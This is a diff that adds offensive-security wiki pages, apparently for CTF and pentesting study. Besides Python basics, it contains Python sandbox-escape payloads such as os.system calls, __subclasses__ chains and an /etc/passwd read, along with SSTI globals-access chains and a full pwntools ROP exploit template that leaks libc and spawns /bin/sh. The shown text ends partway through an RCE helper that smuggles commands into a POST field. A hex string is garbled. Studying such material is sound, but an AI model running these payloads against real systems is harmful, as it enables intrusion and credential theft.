+‘a’ + str\(3\) = ‘a3’  
+\[1,2,3\]+\[4,5\]=\[1,2,3,4,5\]
+
+**Parts of a list**  
+‘abc’\[0\] = ‘a’  
+'abc’\[-1\] = ‘c’  
+'abc’\[1:3\] = ‘bc’ from \[1\] to \[2\]  
+"qwertyuiop"\[:-1\] = 'qwertyuio'
+
+**Comments**  
+\# One line comment  
+"""  
+Several lines comment  
+Another one  
+"""
+
+**Loops**
+
+```text
+if a:
+    #somethig
+elif b:
+    #something
+else:
+    #something
+
+while(a):
+    #comething
+
+for i in range(0,100):
+    #something from 0 to 99
+
+for letter in "hola":
+    #something with letter in "hola"
+```
+
+### Tuples
+
+t1 = \(1,'2,'three'\)  
+t2 = \(5,6\)  
+t3 = t1 + t2 = \(1, '2', 'three', 5, 6\)  
+\(4,\) = Singelton  
+d = \(\) empty tuple  
+d += \(4,\) --&gt; Adding into a tuple  
+CANT! --&gt; t1\[1\] == 'New value'  
+list\(t2\) = \[5,6\] --&gt; From tuple to list
+
+### List \(array\)
+
+d = \[\] empty  
+a = \[1,2,3\]  
+b = \[4,5\]  
+a + b = \[1,2,3,4,5\]  
+b.append\(6\) = \[4,5,6\]  
+tuple\(a\) = \(1,2,3\) --&gt; From list to tuple
+
+### Dictionary
+
+d = {} empty  
+monthNumbers={1:’Jan’, 2: ‘feb’,’feb’:2}—&gt; monthNumbers -&gt;{1:’Jan’, 2: ‘feb’,’feb’:2}  
+monthNumbers\[1\] = ‘Jan’  
+monthNumbers\[‘feb’\] = 2  
+list\(monthNumbers\) = \[1,2,’feb’\]  
+monthNumbers.values\(\) = \[‘Jan’,’feb’,2\]  
+keys = \[k for k in monthNumbers\]  
+a={'9':9}  
+monthNumbers.update\(a\) = {'9':9, 1:’Jan’, 2: ‘feb’,’feb’:2}  
+mN = monthNumbers.copy\(\) \#Independent copy  
+monthNumbers.get\('key',0\) \#Check if key exists, Return value of monthNumbers\["key"\] or 0 if it does not exists
+
+### Set
+
+In the sets there are not repetitions  
+myset = set\(\['a', 'b'\]\) = {'a', 'b'}  
+myset.add\('c'\) = {'a', 'b', 'c'}  
+myset.add\('a'\) = {'a', 'b', 'c'} \#No repetitions  
+myset.update\(\[1,2,3\]\) = set\(\['a', 1, 2, 'b', 'c', 3\]\)  
+myset.discard\(10\) \#If present, remove it, if not, nothing  
+myset.remove\(10\) \#If present remove it, if not, rise exception  
+myset2 = set\(\[1, 2, 3, 4\]\)  
+myset.union\(myset2\) \#Values it myset OR myset2  
+myset.intersection\(myset2\) \#Values in myset AND myset2  
+myset.difference\(myset2\) \#Values in myset but not in myset2  
+myset.symmetric\_difference\(myset2\) \#Values that are not in myset AND myset2 \(not in both\)  
+myset.pop\(\) \#Get the first element of the set and remove it  
+myset.intersection\_update\(myset2\) \#myset = Elements in both myset and myset2  
+myset.difference\_update\(myset2\) \#myset = Elements in myset but not in myset2  
+myset.symmetric\_difference\_update\(myset2\) \#myset = Elements that are not in both
+
+### Classes
+
+The method in \_\_It\_\_ will be the one used by sort in order to compare if an object of this class is bigger than other
+
+```text
+class Person(name):
+	def __init__(self,name):
+		self.name= name
+		self.lastName = name.split(‘ ‘)[-1]
+		self.birthday = None
+ 	def __It__(self, other):
+		if self.lastName == other.lastName:
+			return self.name < other.name
+		return self.lastName < other.lastName #Return True if the lastname is smaller
+
+	def setBirthday(self, month, day. year):
+		self.birthday = date tame.date(year,month,day)
+	def getAge(self):
+		return (date time.date.today() - self.birthday).days
+
+
+class MITPerson(Person):
+	nextIdNum = 0	# Attribute of the Class
+	def __init__(self, name):
+		Person.__init__(self,name)
+		self.idNum = MITPerson.nextIdNum  —> Accedemos al atributo de la clase
+		MITPerson.nextIdNum += 1 #Attribute of the class +1
+
+	def __it__(self, other):
+		return self.idNum < other.idNum
+```
+
+### map, zip, filter, lambda, sorted and one-liners
+
+**Map** is like: \[f\(x\) for x in iterable\] --&gt; map\(tutple,\[a,b\]\) = \[\(1,2,3\),\(4,5\)\]  
+m = map\(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9\]\) --&gt; \[False, False, True, False, False, True, False, False, True\]
+
+**zip** stops when the shorter of foo or bar stops:
+
+```text
+for f, b in zip(foo, bar):
+    print(f, b)
+```
+
+**Lambda** is used to define a function  
+\(lambda x,y: x+y\)\(5,3\) = 8 --&gt; Use lambda as simple **function**  
+**sorted**\(range\(-5,6\), key=lambda x: x\*\* 2\) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5\] --&gt; Use lambda to sort a list  
+m = **filter**\(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9\]\) = \[3, 6, 9\] --&gt; Use lambda to filter  
+**reduce** \(lambda x,y: x\*y, \[1,2,3,4\]\) = 24
+
+```text
+def make_adder(n):
+	return lambda x: x+n
+plus3 = make_adder(3)
+plus3(4) = 7 # 3 + 4 = 7
+
+class Car:
+	crash = lambda self: print('Boom!')
+my_car = Car(); my_car.crash() = 'Boom!'
+```
+
+mult1 = \[x for x in \[1, 2, 3, 4, 5, 6, 7, 8, 9\] if x%3 == 0 \]
+
+### Exceptions
+
+```text
+def divide(x,y):	
+	try:
+		result = x/y
+	except ZeroDivisionError, e:
+		print “division by zero!” + str(e)
+	except TypeError:
+		divide(int(x),int(y))
+	else:
+		print “result i”, result
+	finally
+		print “executing finally clause in any case”
+```
+
+### Assert\(\)
+
+If the condition is false the string will by printed in the screen
+
+```text
+def avg(grades, weights):
+	assert not len(grades) == 0, 'no grades data'
+	assert len(grades) == 'wrong number grades'
+```
+
+### Generators, yield
+
+A generator, instead of returning something, it "yields" something. When you access it, it will "return" the first value generated, then, you can access it again and it will return the next value generated. So, all the values are not generated at the same time and a lot of memory could be saved using this instead of a list with all the values.
+
+```text
+def myGen(n):
+	yield n
+	yield n + 1
+```
+
+g = myGen\(6\) --&gt; 6  
+next\(g\) --&gt; 7  
+next\(g\) --&gt; Error
+
+### Regular Expresions
+
+import re  
+re.search\("\w","hola"\).group\(\) = "h"  
+re.findall\("\w","hola"\) = \['h', 'o', 'l', 'a'\]  
+re.findall\("\w+\(la\)","hola caracola"\) = \['la', 'la'\]
+
+**Special meanings:**  
+. --&gt; Everything  
+\w --&gt; \[a-zA-Z0-9\_\]  
+\d --&gt; Number  
+\s --&gt; WhiteSpace char\[ \n\r\t\f\]  
+\S --&gt; Non-whitespace char  
+^ --&gt; Starts with  
+$ --&gt; Ends with  
++ --&gt; One or more  
+\* --&gt; 0 or more  
+? --&gt; 0 or 1 occurrences
+
+**Options:**  
+re.search\(pat,str,re.IGNORECASE\)  
+IGNORECASE  
+DOTALL --&gt; Allow dot to match newline  
+MULTILINE --&gt; Allow ^ and $ to match in different lines
+
+re.findall\("&lt;.\*&gt;", "&lt;b&gt;foo&lt;/b&gt;and&lt;i&gt;so on&lt;/i&gt;"\) = \['&lt;b&gt;foo&lt;/b&gt;and&lt;i&gt;so on&lt;/i&gt;'\]  
+re.findall\("&lt;.\*?&gt;", "&lt;b&gt;foo&lt;/b&gt;and&lt;i&gt;so on&lt;/i&gt;"\) = \['&lt;b&gt;', '&lt;/b&gt;', '&lt;i&gt;', '&lt;/i&gt;'\]
+
+IterTools  
+**product**  
+from **itertools** import product --&gt; Generates combinations between 1 or more lists, perhaps repeating values, cartesian product \(distributive property\)  
+print list\(**product**\(\[1,2,3\],\[3,4\]\)\) = \[\(1, 3\), \(1, 4\), \(2, 3\), \(2, 4\), \(3, 3\), \(3, 4\)\]  
+print list\(**product**\(\[1,2,3\],repeat = 2\)\) = \[\(1, 1\), \(1, 2\), \(1, 3\), \(2, 1\), \(2, 2\), \(2, 3\), \(3, 1\), \(3, 2\), \(3, 3\)\]
+
+**permutations**  
+from **itertools** import **permutations** --&gt; Generates combinations of all characters in every position  
+print list\(permutations\(\['1','2','3'\]\)\) = \[\('1', '2', '3'\), \('1', '3', '2'\), \('2', '1', '3'\),... Every posible combination  
+print\(list\(permutations\('123',2\)\)\) = \[\('1', '2'\), \('1', '3'\), \('2', '1'\), \('2', '3'\), \('3', '1'\), \('3', '2'\)\] Every posible combination of lenght 2
+
+**combinations**  
+from itertools import **combinations** --&gt; Generates all possible combinations without repeating characters \(if "ab" existing, doesn't generate "ba"\)  
+print\(list\(**combinations**\('123',2\)\)\) --&gt; \[\('1', '2'\), \('1', '3'\), \('2', '3'\)\]
+
+**combinations\_with\_replacement**  
+from itertools import **combinations\_with\_replacement** --&gt; Generates all possible combinations from the char onwards\(for example, the 3rd is mixed from the 3rd onwards but not with the 2nd o first\)  
+print\(list\(**combinations\_with\_replacement**\('1133',2\)\)\) = \[\('1', '1'\), \('1', '1'\), \('1', '3'\), \('1', '3'\), \('1', '1'\), \('1', '3'\), \('1', '3'\), \('3', '3'\), \('3', '3'\), \('3', '3'\)\]
+
+### Decorators
+
+Decorator that size the time that a function needs to be executed \(from [here](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74)\):
+
+```python
+from functools import wraps
+import time
+def timeme(func):
+  @wraps(func)
+  def wrapper(*args, **kwargs):
+    print("Let's call our decorated function")
+    start = time.time()
+    result = func(*args, **kwargs)
+    print('Execution time: {} seconds'.format(time.time() - start))
+    return result
+  return wrapper
+
+@timeme
+def decorated_func():
+  print("Decorated func!")
+```
+
+If you run it, you will see something like the following:
+
+```text
+Let's call our decorated function
+Decorated func!
+Execution time: 4.792213439941406e-05 seconds
+```
+
diff --git a/misc/basic-python/bruteforce-hash-few-chars.md b/misc/basic-python/bruteforce-hash-few-chars.md
new file mode 100644
index 00000000..d86532ec
--- /dev/null
+++ b/misc/basic-python/bruteforce-hash-few-chars.md
@@ -0,0 +1,16 @@
+# Bruteforce hash \(few chars\)
+
+```python
+import hashlib
+
+target = '2f2e2e' #/..
+candidate = 0
+while True:
+    plaintext = str(candidate)
+    hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
+    if hash[-1*(len(target)):] == target: #End in target
+        print('plaintext:"' + plaintext + '", md5:' + hash)
+        break
+    candidate = candidate + 1
+```
+
diff --git a/misc/basic-python/bypass-python-sandboxes.md b/misc/basic-python/bypass-python-sandboxes.md
new file mode 100644
index 00000000..4855c21f
--- /dev/null
+++ b/misc/basic-python/bypass-python-sandboxes.md
@@ -0,0 +1,299 @@
+# Bypass Python sandboxes
+
+These are some tricks to bypass python sandbox protections and execute arbitrary commands.
+
+## Command Execution Libraries
+
+The first thing you need to know is if you can directly execute code with some already imported library, or if you could import any of these libraries:
+
+```python
+os.system("ls")
+os.popen("ls").read()
+commands.getstatusoutput("ls") 
+commands.getoutput("ls")
+commands.getstatus("file/path")
+subprocess.call("ls", shell=True)
+subprocess.Popen("ls", shell=True)
+pty.spawn("ls")
+pty.spawn("/bin/bash")
+platform.popen("ls").read()
+
+#Other interesting functions
+open("/etc/passwd").read()
+open('/var/www/html/input', 'w').write('123')
+```
+
+Remember that the _**open**_ and _**read**_ functions can be useful to **read files** inside the python sandbox and to **write some code** that you could **execute** to **bypass** the sandbox.  
+Python2 **input\(\)** function allows to execute python code before the program crashes.
+
+### Importing
+
+```python
+import os
+from os import *
+__import__('os').system("ls")
+```
+
+If **`sys`**module is present, you can use it to access **`os`**library for example:
+
+```python
+sys.modules["os"].system("ls")
+```
+
+You can also import libraries and any file is using **`execfile()`** \(python2\):
+
+```python
+execfile('/usr/lib/python2.7/os.py')
+system('ls')
+```
+
+Python try to **load libraries from the current directory first**: `python3 -c 'import sys; print(sys.path)'`
+
+## Executing python code
+
+This is really interesting if some characters are forbidden because you can use the **hex/octal/B64** representation to **bypass** the restriction:
+
+```python
+exec("print('RCE'); __import__('os').system('ls')") #Using ";"
+exec("print('RCE')\n__import__('os').system('ls')") #Using "\n"
+eval("__import__('os').system('ls')") #Eval doesn't allow ";"
+eval(compile('print("hello world"); print("heyy")', '<stdin>', 'exec')) #This way eval accept ";"
+__import__('timeit').timeit("__import__('os').system('ls')",number=1)
+#One liners that allow new lines and tabs
+eval(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '<stdin>', 'exec'))
+exec(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '<stdin>', 'exec'))
+```
+
+```python
+#Octal
+exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51")
+#Hex
+exec("\x5f\x5f\x69\x6d\xIf youca70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x6c\x73\x27\x29")
+#Base64
+exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
+exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
+```
+
+### Compiling
+
+In a previous example you can see how to execute any python code using the `compile` function. This is really interesting because you can execute whole scripts with loops and everything in a one liner \(and we could do the same using `exec`\).  
+Anyway, sometimes it could be useful to **create** a **compiled object** in a local machine and execute it in the **CTF** \(for example because we don't have the `compile` function in the CTF\).
+
+For example, let's compile and execute manually a function that reads _./poc.py_:
+
+```python
+#Locally
+def read():
+    return open("./poc.py",'r').read()
+    
+read.__code__.co_code
+'t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S'
+```
+
+```python
+#On Remote
+function_type = type(lambda: None)
+code_type = type((lambda: None).__code__) #Get <type 'type'>
+consts = (None, "./poc.py", 'r')
+bytecode = 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S'
+names = ('open','read')
+
+# And execute it using eval/exec
+eval(code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ()))
+
+#You could also execut it directly
+import __builtin__
+mydict = {}
+mydict['__builtins__'] = __builtin__
+codeobj = code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ())
+function_type(codeobj, mydict, None, None, None)()
+```
+
+If you cannot access `eval` or `exec` you could create a **proper function**, but calling it directly is usually going to fail with: _constructor not accessible in restricted mode_. So you need a **function not in the restricted environment call this function.**
+
+```python
+#Compile a regular print
+ftype = type(lambda: None)
+ctype = type((lambda: None).func_code)
+f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdin', 'f', 1, ''), {})
+f(42)
+```
+
+## Builtins
+
+[Builtins functions of python2  
+](https://docs.python.org/2/library/functions.html)[Builtins functions of python3](https://docs.python.org/3/library/functions.html)
+
+If you can access to the**`__builtins__`** object you can import libraries \(notice that you could also use here other string representation showed in last section\):
+
+```python
+__builtins__.__dict__['__import__']("os").system("ls")
+```
+
+### No Builtins
+
+When you don't have \_\_builtins\_\_ you are not going to be able to import anything nor even read or write files. But there is a way to take that functionality back:
+
+**Python2**
+
+```python
+#Try to reload __builtins__
+reload(__builtins__)
+import __builtin__
+
+# Read recovering <type 'file'> in offset 40
+().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()
+# Write recovering <type 'file'> in offset 40
+().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
+
+# Execute recovering __import__ (class 59s is <class 'warnings.catch_warnings'>)
+().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']('os').system('ls')
+# Execute (another method)
+().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__("func_globals")['linecache'].__dict__['os'].__dict__['system']('ls')
+# Execute recovering eval symbol (class 59 is <class 'warnings.catch_warnings'>)
+().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]["eval"]("__import__('os').system('ls')")
+
+# Or you could recover __builtins__ in make eveything easier
+__builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__)
+__builtins__["__import__"]('os').system('ls')
+
+# Or you could obtain the builtins from a defined function
+get_flag.__globals__['__builtins__']['__import__']("os").system("ls")
+```
+
+#### Python3
+
+```python
+# Obtain the builtins from a defined function
+get_flag.__globals__['__builtins__'].__import__("os").system("ls")
+```
+
+### Finding types
+
+```python
+''.__class__     #<type 'str'>
+str.__class__    #<type 'type'>
+str.__class__('') #<type 'str'>
+().__class__.__base__.__subclasses__()    #Several types
+().__class__.__bases__[0].__subclasses__()#Several types
+```
+
+## Dissecting functions
+
+In some CTFs you could be provided the name of a custom function where the flag resides and you need to see the internals of the function to extract it.
+
+This is the function to inspect:
+
+```python
+def get_flag(some_input):
+    var1=1
+    var2="secretcode"
+    var3=["some","array"]
+    if some_input == var2:
+        return "THIS-IS-THE-FALG!"
+    else:
+        return "Nope"
+```
+
+#### dir
+
+```python
+dir() #General dir() to find what we have loaded
+['__builtins__', '__doc__', '__name__', '__package__', 'b', 'bytecode', 'code', 'codeobj', 'consts', 'dis', 'filename', 'foo', 'get_flag', 'names', 'read', 'x']
+dir(get_flag) #Get info tof the function
+['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']
+```
+
+#### globals
+
+`__globals__` and `func_globals`\(Same\) Obtains the global environment. In the example you can see some imported modules, some global variables and their content declared:
+
+```python
+get_flag.func_globals
+get_flag.__globals__
+{'b': 3, 'names': ('open', 'read'), '__builtins__': <module '__builtin__' (built-in)>, 'codeobj': <code object <module> at 0x7f58c00b26b0, file "noname", line 1>, 'get_flag': <function get_flag at 0x7f58c00b27d0>, 'filename': './poc.py', '__package__': None, 'read': <function read at 0x7f58c00b23d0>, 'code': <type 'code'>, 'bytecode': 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S', 'consts': (None, './poc.py', 'r'), 'x': <unbound method catch_warnings.__init__>, '__name__': '__main__', 'foo': <function foo at 0x7f58c020eb50>, '__doc__': None, 'dis': <module 'dis' from '/usr/lib/python2.7/dis.pyc'>}
+
+#If you have access to some variable value
+CustomClassObject.__class__.__init__.__globals__
+```
+
+`__code__` and `func_code`: You can access this to obtain some internal data of the function
+
+```python
+#Get the options
+dir(get_flag.func_code)
+['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames']
+#Get internal varnames
+get_flag.func_code.co_varnames
+('some_input', 'var1', 'var2', 'var3')
+#Get the value of the vars
+get_flag.func_code.co_consts
+(None, 1, 'secretcode', 'some', 'array', 'THIS-IS-THE-FALG!', 'Nope')
+#Get bytecode
+get_flag.func_code.co_code
+'d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S'
+```
+
+**Disassembly a function**
+
+```python
+import dis
+dis.dis(get_flag)
+  2           0 LOAD_CONST               1 (1)
+              3 STORE_FAST               1 (var1)
+
+  3           6 LOAD_CONST               2 ('secretcode')
+              9 STORE_FAST               2 (var2)
+
+  4          12 LOAD_CONST               3 ('some')
+             15 LOAD_CONST               4 ('array')
+             18 BUILD_LIST               2
+             21 STORE_FAST               3 (var3)
+
+  5          24 LOAD_FAST                0 (some_input)
+             27 LOAD_FAST                2 (var2)
+             30 COMPARE_OP               2 (==)
+             33 POP_JUMP_IF_FALSE       40
+
+  6          36 LOAD_CONST               5 ('THIS-IS-THE-FALG!')
+             39 RETURN_VALUE        
+
+  8     >>   40 LOAD_CONST               6 ('Nope')
+             43 RETURN_VALUE        
+             44 LOAD_CONST               0 (None)
+             47 RETURN_VALUE        
+```
+
+Notice that **if you cannot import `dis` in the python sandbox** you can obtain the **bytecode** of the function \(`get_flag.func_code.co_code`\) and **disassemble** it locally. You won't see the content of the variables being loaded \(`LOAD_CONST`\) but you can guess them from \(`get_flag.func_code.co_consts`\) because `LOAD_CONST`also tells the offset of the variable being loaded.
+
+```python
+dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S')
+          0 LOAD_CONST          1 (1)
+          3 STORE_FAST          1 (1)
+          6 LOAD_CONST          2 (2)
+          9 STORE_FAST          2 (2)
+         12 LOAD_CONST          3 (3)
+         15 LOAD_CONST          4 (4)
+         18 BUILD_LIST          2
+         21 STORE_FAST          3 (3)
+         24 LOAD_FAST           0 (0)
+         27 LOAD_FAST           2 (2)
+         30 COMPARE_OP          2 (==)
+         33 POP_JUMP_IF_FALSE    40
+         36 LOAD_CONST          5 (5)
+         39 RETURN_VALUE   
+    >>   40 LOAD_CONST          6 (6)
+         43 RETURN_VALUE   
+         44 LOAD_CONST          0 (0)
+         47 RETURN_VALUE   
+```
+
+## References
+
+* [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/)
+* [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/)
+* [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/)
+* [https://gynvael.coldwind.pl/n/python\_sandbox\_escape](https://gynvael.coldwind.pl/n/python_sandbox_escape)
+
+\*\*\*\*
+
diff --git a/misc/basic-python/magic-methods.md b/misc/basic-python/magic-methods.md
new file mode 100644
index 00000000..5b3108f3
--- /dev/null
+++ b/misc/basic-python/magic-methods.md
@@ -0,0 +1,59 @@
+# Magic Methods
+
+## Class Methods
+
+You can access the **methods** of a **class** using **\_\_dict\_\_.**
+
+![](../../.gitbook/assets/image%20%28275%29.png)
+
+You can access the functions 
+
+![](../../.gitbook/assets/image%20%28285%29.png)
+
+## Object class
+
+### **Attributes**
+
+You can access the **attributes of an object** using **\_\_dict\_\_**. Example:
+
+![](../../.gitbook/assets/image%20%28146%29.png)
+
+### Class
+
+You can access the **class** of an object using **\_\_class\_\_**
+
+![](../../.gitbook/assets/image%20%28221%29.png)
+
+You can access the **methods** of the **class** of an **object chainning** magic functions:
+
+![](../../.gitbook/assets/image%20%28114%29.png)
+
+## Server Side Template Injection
+
+Interesting functions to exploit this vulnerability 
+
+```text
+__init__.__globals__
+__class__.__init__.__globals__
+```
+
+Inside the response search for the application \(probably at the end?\)
+
+Then **access the environment content** of the application where you will hopefully find **some passwords** of interesting information:
+
+```text
+__init__.__globals__[<name>].config
+__init__.__globals__[<name>].__dict__
+__init__.__globals__[<name>].__dict__.config
+__class__.__init__.__globals__[<name>].config
+__class__.__init__.__globals__[<name>].__dict__
+__class__.__init__.__globals__[<name>].__dict__.config
+```
+
+## More Information
+
+* [https://rushter.com/blog/python-class-internals/](https://rushter.com/blog/python-class-internals/)
+* [https://docs.python.org/3/reference/datamodel.html](https://docs.python.org/3/reference/datamodel.html)
+* [https://balsn.tw/ctf\_writeup/20190603-facebookctf/\#events](https://balsn.tw/ctf_writeup/20190603-facebookctf/#events)
+* [https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0](https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0) \(events\)
+
diff --git a/misc/basic-python/rop-pwn-template.md b/misc/basic-python/rop-pwn-template.md
new file mode 100644
index 00000000..830fcfaf
--- /dev/null
+++ b/misc/basic-python/rop-pwn-template.md
@@ -0,0 +1,122 @@
+# ROP-PWN template
+
+{% code title="template.py" %}
+```python
+from pwn import * # Import pwntools
+
+
+####################
+#### CONNECTION ####
+####################
+LOCAL = True
+REMOTETTCP = False
+REMOTESSH = False
+GDB = False
+
+local_bin = "./vuln"
+remote_bin = "~/vuln" #For ssh
+libc = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
+
+if LOCAL:
+    p = process(local_bin) # start the vuln binary
+    elf = ELF(local_bin)# Extract data from binary
+    rop = ROP(elf)# Find ROP gadgets
+
+elif REMOTETTCP:
+    p = remote('docker.hackthebox.eu',31648) # start the vuln binary
+    elf = ELF(local_bin)# Extract data from binary
+    rop = ROP(elf)# Find ROP gadgets
+
+elif REMOTESSH:
+    ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
+    p = ssh_shell.process(remote_bin) # start the vuln binary
+    elf = ELF(local_bin)# Extract data from binary
+    rop = ROP(elf)# Find ROP gadgets
+
+
+if GDB and not REMOTETTCP and not REMOTESSH:
+    # attach gdb and continue
+    # You can set breakpoints, for example "break *main"
+    gdb.attach(p.pid, "continue")
+
+
+####################
+#### Find offset ###
+####################
+OFFSET = ""#"A"*72
+if OFFSET == "":
+    gdb.attach(p.pid, "c") #Attach and continue
+    payload = cyclic(1000)
+    print(p.clean())
+    p.sendline(payload)
+    #x/wx $rsp -- Search for bytes that crashed the application
+    #cyclic_find(0x6161616b) # Find the offset of those bytes
+    p.interactive()
+    exit()
+
+
+#####################
+#### Find Gadgets ###
+#####################
+try:
+    PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
+except:
+    PUTS_PLT = elf.plt['printf']
+MAIN_PLT = elf.symbols['main']
+POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
+
+log.info("Main start: " + hex(MAIN_PLT))
+log.info("Puts plt: " + hex(PUTS_PLT))
+log.info("pop rdi; ret  gadget: " + hex(POP_RDI))
+
+def get_addr(func_name):
+    FUNC_GOT = elf.got[func_name]
+    log.info(func_name + " GOT @ " + hex(FUNC_GOT))
+    # Create rop chain
+    rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
+
+    #Send our rop-chain payload
+    #p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
+    print(p.clean()) # clean socket buffer (read all and print)
+    p.sendline(rop1)
+
+    #Parse leaked address
+    recieved = p.recvline().strip()
+    leak = u64(recieved.ljust(8, "\x00"))
+    log.info("Leaked libc address,  "+func_name+": "+ hex(leak))
+    #If not libc yet, stop here
+    if libc != "":
+        libc.address = leak - libc.symbols[func_name] #Save libc base
+        log.info("libc base @ %s" % hex(libc.address))
+    
+    return hex(leak)
+
+get_addr("puts") #Search for puts address in memmory to obtains libc base
+if libc == "":
+    print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
+    p.interactive()
+
+# Notice that if a libc was specified the base of the library will be saved in libc.address
+# this implies that in the future if you search for functions in libc, the resulting address
+# will be the real one, you can use it directly (NOT NEED TO ADD AGAINF THE LIBC BASE ADDRESS)
+
+#################################
+### GET SHELL with known LIBC ###
+#################################
+BINSH = next(libc.search("/bin/sh")) #Verify with find /bin/sh
+SYSTEM = libc.sym["system"]
+EXIT = libc.sym["exit"]
+
+log.info("bin/sh %s " % hex(BINSH))
+log.info("system %s " % hex(SYSTEM))
+
+rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
+
+p.clean()
+p.sendline(rop2)
+
+##### Interact with the shell #####
+p.interactive() #Interact with the conenction
+```
+{% endcode %}
+
diff --git a/misc/basic-python/web-requests.md b/misc/basic-python/web-requests.md
new file mode 100644
index 00000000..b5e6db3b
--- /dev/null
+++ b/misc/basic-python/web-requests.md
@@ -0,0 +1,66 @@
+---
+description: 'Get request, Post request (regular, json, file)'
+---
+
+# Web Requests
+
+```python
+import requests
+
+url = "http://example.com:80/some/path.php"
+params = {"p1":"value1", "p2":"value2"}
+headers = {"User-Agent": "fake User Agent", "Fake header": "True value"}
+cookies = {"PHPSESSION": "1234567890abcdef", "FakeCookie123": "456"}
+proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
+
+#Regular Get requests sending parameters (params)
+gr = requests.get(url, params=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True)
+
+code = gr.status_code
+ret_headers = gr.headers
+body_byte = gr.content
+body_text = gr.text
+ret_cookies = gr.cookies
+is_redirect = gr.is_redirect
+is_permanent_redirect = gr.is_permanent_redirect
+
+#Regular Post requests sending parameters (data)
+pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
+
+#Json Post requests sending parameters(json)
+pr = requests.post(url, json=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
+
+#Post request sending a file(files) and extra values
+filedict = {"<FILE_PARAMETER_NAME>" : ("filename.png", open("filename.png", 'rb').read(), "image/png")}
+pr = requests.post(url, data={"submit": "submit"}, files=filedict)
+```
+
+## Python cmd to exploit a RCE
+
+```python
+import requests
+import re
+from cmd import Cmd
+
+class Terminal(Cmd):
+    prompt = "Inject => "
+
+    def default(self, args):
+        output = RunCmd(args)
+        print(output)
+
+def RunCmd(cmd):
+    data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' }
+    r = requests.post('http://10.10.10.127/select', data=data)
+    page = r.text
